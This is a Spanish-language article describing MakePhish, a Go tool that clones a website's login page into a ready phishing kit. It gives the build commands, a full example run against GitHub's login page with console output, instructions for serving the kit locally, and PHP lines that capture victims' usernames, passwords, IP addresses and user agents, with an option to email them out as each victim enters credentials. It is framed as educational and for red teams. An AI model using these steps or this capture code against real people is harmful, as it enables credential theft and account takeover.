Ser capaz de clonar sitios web es una gran manera de ayudar en las pruebas de penetración, pero ¿qué pasa si se puede dar un paso más allá? ¿Y si pudieras crear una herramienta que creara automáticamente clones de sitios web? Ahí es donde entra MakePhish.
Esta es una prueba de concepto para crear automáticamente kits de phishing basados en una URL especificada, por favor, ten en cuenta que makephish funcionará exclusivamente en sitios web que tengan páginas simples con logins.
El propósito de este proyecto es puramente educativo: @andpalmier escribió makephish para familiarizarse con Go, esto también significa que el código está mal escrito y organizado. La idea del proyecto es también mostrar lo fácil que es clonar un sitio web y utilizarlo para crear páginas de phishing.
Instalación y Uso
Después de descargar el repositorio, navega en el directorio y construya el proyecto:
git clone https://github.com/andpalmier/makephish.git
cd makephish/
make makephish
Esto creará una carpeta build con un ejecutable llamado makephish. Puedes ejecutar el ejecutable con las siguientes opciones:
-url: URL de la página de inicio de sesión-ua: Cadena de agente de usuario, por defecto “Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0”-php: Ruta del archivo PHP a utilizar, por defecto “phish.php“-kits: Ruta utilizada para almacenar los kits, por defecto “./kits“
Ejemplo de Uso
$ ./build/makephish -url "https://github.com/login/"
_ _ _ _
_____ __| |_ ___ ___| |_|_|___| |_
| ||. | '_| -_| . | | |_ -| |
|_|_|_|___|_|_|___| _|_|_|_|___|_|_|
|_|
Navigating to https://github.com/login using the following User agent string: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Parameters found in the form of the given URL:
- post action = /session
- login attribute name = login
- password attribute name = password
HTML file patched and saved in kits/github.com
PHP file saved in kits/github.com
[*] operation completed! kit created for https://github.com/login and saved in kits/github.com
$ tree kits/github.com
kits/github.com
├── assets
│ ├── behaviors-afe1a202.js
│ ├── chunk-frameworks-81b94425.js
│ ├── chunk-vendor-4d97ead9.js
│ ├── environment-f0adafbf.js
│ ├── frameworks-052cbe13e4b93c9b8358a7178885c1a0.css
│ ├── github-f19f9fd1ee83046f59cf1815d967f4d0.css
│ ├── sessions-45084fea.js
│ ├── settings-c44d66a8.js
│ ├── site-ca634d80a8a0df2203c34902267667dc.css
│ └── unsupported-a85b1284.js
├── index.html
└── phish.php
1 directory, 12 files
$ cd kits/github.com
$ php -S localhost:8000
[Sun Jan 10 12:10:54 2021] PHP 7.4.14 Development Server (http://localhost:8000) started
Intentemos con Facebook. En este punto, si vas a localhost:8000 deberías encontrar algo como esto:
Si introduces unas credenciales al azar, notarás que serás redirigido a la página de inicio de sesión real de facebook.com:
Si no has modificado el archivo phish.php, puedes encontrar las credenciales que acabas de introducir en localhost:8000/log:
Cabe mencionar que hay que ajustar las variables del archivo phish.php a las proporcionadas por la consola de ejecución:
...
- login attribute name = login
- password attribute name = password...
$message .= "Username/Email: ".$parsed['login']."\n";
$message .= "Password: ".$parsed["password"]."\n";Capacidades de PHP
Se proporciona un archivo PHP simple en este repo, pero puedes ajustarlo fácilmente a tus necesidades. Por defecto, el archivo guardará el nombre de usuario, la contraseña, la cadena de agente de usuario y la IP de la víctima en un archivo de registro, puedes desactivar esta opción eliminando el contenido de la variable log. También puede especificar una dirección de correo electrónico para enviar estos detalles por correo electrónico cada vez que una nueva víctima introduzca las credenciales.
$exfilemail = ""; // -> introduce una dirección de correo electrónico para enviar los detalles por correo electrónico
$logpath = "log"; // -> haz que esta variable esté vacía para desactivar la función de registroEn el mundo del pentesting, un atacante a menudo querrá utilizar las mismas herramientas para realizar un ataque que los defensores. Esto es especialmente cierto cuando al atacante se le ha concedido acceso a una red. Sin duda alguna, MakePhish es una herramienta dedicada a Equipos Rojos.
https://github.com/andpalmier/makephish